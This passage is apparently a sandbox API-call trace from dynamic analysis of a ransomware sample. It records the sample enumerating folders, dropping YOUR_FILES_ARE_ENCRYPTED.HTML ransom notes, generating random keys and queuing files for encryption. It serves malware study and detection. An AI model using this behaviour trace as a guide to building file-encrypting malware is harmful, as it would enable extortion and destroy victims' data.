ftLastAccessTime.dwLowDateTime=0x6fa637de, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6fa637de, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x25000025, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0119.210] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6fa637de, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6fa637de, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6fa637de, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x25000025, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0119.210] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6fa637de, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6fa637de, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6fa637de, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x25000025, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 0 [0119.210] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0119.210] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\KPTCCOJ4\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 167 [0119.210] GetProcessHeap () returned 0x600000 [0119.210] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3114fd8 [0119.210] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\KPTCCOJ4\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\internet explorer\\domstore\\kptccoj4\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0119.211] WriteFile (in: hFile=0x318, lpBuffer=0x3114fd8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19d840, lpOverlapped=0x0 | out: lpBuffer=0x3114fd8*, lpNumberOfBytesWritten=0x19d840*=0x3c00, lpOverlapped=0x0) returned 1 [0119.212] CloseHandle (hObject=0x318) returned 1 [0119.212] GetProcessHeap () returned 0x600000 [0119.212] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3114fd8 | out: hHeap=0x600000) returned 1 [0119.212] GetProcessHeap () returned 0x600000 [0119.212] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x680348 | out: hHeap=0x600000) returned 1 [0119.212] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6fa637de, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6fa637de, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6fa637de, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630488, dwReserved1=0x63d098, cFileName="V1VIG64D", cAlternateFileName="")) returned 1 [0119.212] StrStrIW (lpFirst="V1VIG64D", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.212] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\V1VIG64D") returned 137 [0119.212] GetProcessHeap () returned 0x600000 [0119.212] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x680348 [0119.212] lstrcpyW (in: lpString1=0x680348, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\V1VIG64D" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\V1VIG64D") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\V1VIG64D" [0119.212] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\V1VIG64D", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\V1VIG64D\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\V1VIG64D\\*" [0119.212] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\V1VIG64D\\*", lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6fa637de, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6fa637de, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6fa637de, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x25000025, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626838 [0119.212] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6fa637de, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6fa637de, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6fa637de, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x25000025, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0119.212] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6fa637de, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6fa637de, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x26e505e4, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0xe24, dwReserved0=0x25000025, dwReserved1=0x7784abfa, cFileName="www.bing[1].xml", cAlternateFileName="WWWBIN~1.XML")) returned 1 [0119.212] StrStrIW (lpFirst="www.bing[1].xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.212] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\V1VIG64D\\www.bing[1].xml") returned 153 [0119.213] PathFindExtensionW (pszPath="www.bing[1].xml") returned=".xml" [0119.213] lstrlenW (lpString=".xml") returned 4 [0119.213] PathFindExtensionW (pszPath="www.bing[1].xml") returned=".xml" [0119.213] SystemFunction036 (in: RandomBuffer=0x19d51c, RandomBufferLength=0x20 | out: RandomBuffer=0x19d51c) returned 1 [0119.213] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\V1VIG64D\\www.bing[1].xml" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\internet explorer\\domstore\\v1vig64d\\www.bing[1].xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0119.213] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19d540 | out: lpFileSize=0x19d540*=3620) returned 1 [0119.213] GetProcessHeap () returned 0x600000 [0119.213] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0119.216] wsprintfW (in: param_1=0x19d45a, param_2="%02X" | out: param_1="DE") returned 2 [0119.216] wsprintfW (in: param_1=0x19d45e, param_2="%02X" | out: param_1="C6") returned 2 [0119.216] wsprintfW (in: param_1=0x19d462, param_2="%02X" | out: param_1="2E") returned 2 [0119.216] wsprintfW (in: param_1=0x19d466, param_2="%02X" | out: param_1="A8") returned 2 [0119.216] wsprintfW (in: param_1=0x19d46a, param_2="%02X" | out: param_1="53") returned 2 [0119.216] wsprintfW (in: param_1=0x19d46e, param_2="%02X" | out: param_1="94") returned 2 [0119.216] wsprintfW (in: param_1=0x19d472, param_2="%02X" | out: param_1="72") returned 2 [0119.216] wsprintfW (in: param_1=0x19d476, param_2="%02X" | out: param_1="CE") returned 2 [0119.216] wsprintfW (in: param_1=0x19d47a, param_2="%02X" | out: param_1="A1") returned 2 [0119.216] wsprintfW (in: param_1=0x19d47e, param_2="%02X" | out: param_1="74") returned 2 [0119.216] wsprintfW (in: param_1=0x19d482, param_2="%02X" | out: param_1="76") returned 2 [0119.216] wsprintfW (in: param_1=0x19d486, param_2="%02X" | out: param_1="D4") returned 2 [0119.216] wsprintfW (in: param_1=0x19d48a, param_2="%02X" | out: param_1="92") returned 2 [0119.216] wsprintfW (in: param_1=0x19d48e, param_2="%02X" | out: param_1="5C") returned 2 [0119.216] wsprintfW (in: param_1=0x19d492, param_2="%02X" | out: param_1="11") returned 2 [0119.216] wsprintfW (in: param_1=0x19d496, param_2="%02X" | out: param_1="90") returned 2 [0119.216] wsprintfW (in: param_1=0x19d49a, param_2="%02X" | out: param_1="91") returned 2 [0119.216] wsprintfW (in: param_1=0x19d49e, param_2="%02X" | out: param_1="3F") returned 2 [0119.216] wsprintfW (in: param_1=0x19d4a2, param_2="%02X" | out: param_1="DE") returned 2 [0119.216] wsprintfW (in: param_1=0x19d4a6, param_2="%02X" | out: param_1="C2") returned 2 [0119.216] wsprintfW (in: param_1=0x19d4aa, param_2="%02X" | out: param_1="F3") returned 2 [0119.216] wsprintfW (in: param_1=0x19d4ae, param_2="%02X" | out: param_1="BF") returned 2 [0119.216] wsprintfW (in: param_1=0x19d4b2, param_2="%02X" | out: param_1="B3") returned 2 [0119.216] wsprintfW (in: param_1=0x19d4b6, param_2="%02X" | out: param_1="7A") returned 2 [0119.216] wsprintfW (in: param_1=0x19d4ba, param_2="%02X" | out: param_1="65") returned 2 [0119.216] wsprintfW (in: param_1=0x19d4be, param_2="%02X" | out: param_1="C6") returned 2 [0119.216] wsprintfW (in: param_1=0x19d4c2, param_2="%02X" | out: param_1="4F") returned 2 [0119.216] wsprintfW (in: param_1=0x19d4c6, param_2="%02X" | out: param_1="F8") returned 2 [0119.216] wsprintfW (in: param_1=0x19d4ca, param_2="%02X" | out: param_1="C1") returned 2 [0119.216] wsprintfW (in: param_1=0x19d4ce, param_2="%02X" | out: param_1="31") returned 2 [0119.217] wsprintfW (in: param_1=0x19d4d2, param_2="%02X" | out: param_1="0C") returned 2 [0119.217] wsprintfW (in: param_1=0x19d4d6, param_2="%02X" | out: param_1="1D") returned 2 [0119.217] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\V1VIG64D\\www.bing[1].xml" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\V1VIG64D\\www.bing[1].xml") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\V1VIG64D\\www.bing[1].xml" [0119.217] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.217] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0119.217] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6fa637de, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6fa637de, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x26e505e4, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0xe24, dwReserved0=0x25000025, dwReserved1=0x7784abfa, cFileName="www.bing[1].xml", cAlternateFileName="WWWBIN~1.XML")) returned 0 [0119.217] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0119.217] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\V1VIG64D\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 167 [0119.217] GetProcessHeap () returned 0x600000 [0119.217] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3114fd8 [0119.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\V1VIG64D\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\internet explorer\\domstore\\v1vig64d\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0119.218] WriteFile (in: hFile=0x318, lpBuffer=0x3114fd8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19d840, lpOverlapped=0x0 | out: lpBuffer=0x3114fd8*, lpNumberOfBytesWritten=0x19d840*=0x3c00, lpOverlapped=0x0) returned 1 [0119.219] CloseHandle (hObject=0x318) returned 1 [0119.219] GetProcessHeap () returned 0x600000 [0119.219] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3114fd8 | out: hHeap=0x600000) returned 1 [0119.219] GetProcessHeap () returned 0x600000 [0119.219] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x680348 | out: hHeap=0x600000) returned 1 [0119.219] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6fa637de, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6fa637de, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6fa637de, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630488, dwReserved1=0x63d098, cFileName="WTR48WZB", cAlternateFileName="")) returned 1 [0119.219] StrStrIW (lpFirst="WTR48WZB", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.219] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\WTR48WZB") returned 137 [0119.219] GetProcessHeap () returned 0x600000 [0119.219] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30c81a0 [0119.220] lstrcpyW (in: lpString1=0x30c81a0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\WTR48WZB" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\WTR48WZB") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\WTR48WZB" [0119.220] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\WTR48WZB", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\WTR48WZB\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\WTR48WZB\\*" [0119.220] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\WTR48WZB\\*", lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6fa637de, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6fa637de, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6fa637de, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x25000025, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626838 [0119.220] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6fa637de, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6fa637de, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6fa637de, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x25000025, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0119.220] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6fa637de, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6fa637de, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6fa637de, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x25000025, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 0 [0119.220] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0119.220] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\WTR48WZB\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 167 [0119.220] GetProcessHeap () returned 0x600000 [0119.220] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3114fd8 [0119.220] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\WTR48WZB\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\internet explorer\\domstore\\wtr48wzb\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0119.220] WriteFile (in: hFile=0x318, lpBuffer=0x3114fd8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19d840, lpOverlapped=0x0 | out: lpBuffer=0x3114fd8*, lpNumberOfBytesWritten=0x19d840*=0x3c00, lpOverlapped=0x0) returned 1 [0119.221] CloseHandle (hObject=0x318) returned 1 [0119.222] GetProcessHeap () returned 0x600000 [0119.222] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3114fd8 | out: hHeap=0x600000) returned 1 [0119.222] GetProcessHeap () returned 0x600000 [0119.222] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0119.222] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6fa637de, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6fa637de, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6fa637de, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630488, dwReserved1=0x63d098, cFileName="WTR48WZB", cAlternateFileName="")) returned 0 [0119.222] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0119.222] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 158 [0119.222] GetProcessHeap () returned 0x600000 [0119.222] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3114fd8 [0119.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\internet explorer\\domstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0119.227] WriteFile (in: hFile=0x32c, lpBuffer=0x3114fd8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19db54, lpOverlapped=0x0 | out: lpBuffer=0x3114fd8*, lpNumberOfBytesWritten=0x19db54*=0x3c00, lpOverlapped=0x0) returned 1 [0119.228] CloseHandle (hObject=0x32c) returned 1 [0119.228] GetProcessHeap () returned 0x600000 [0119.228] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3114fd8 | out: hHeap=0x600000) returned 1 [0119.228] GetProcessHeap () returned 0x600000 [0119.228] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0119.230] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6fa3d60b, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6fa3d60b, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6fa637de, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName="DOMStore", cAlternateFileName="")) returned 0 [0119.230] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0119.230] wnsprintfW (in: pszDest=0x3104fd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 149 [0119.230] GetProcessHeap () returned 0x600000 [0119.230] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3114fd8 [0119.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\internet explorer\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0119.231] WriteFile (in: hFile=0x324, lpBuffer=0x3114fd8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x3114fd8*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0119.232] CloseHandle (hObject=0x324) returned 1 [0119.232] GetProcessHeap () returned 0x600000 [0119.232] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3114fd8 | out: hHeap=0x600000) returned 1 [0119.232] GetProcessHeap () returned 0x600000 [0119.232] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.232] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6da0d9db, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6da0d9db, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6da0d9db, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName="Windows", cAlternateFileName="")) returned 1 [0119.232] FindNextFileW (in: hFindFile=0x6266f8, 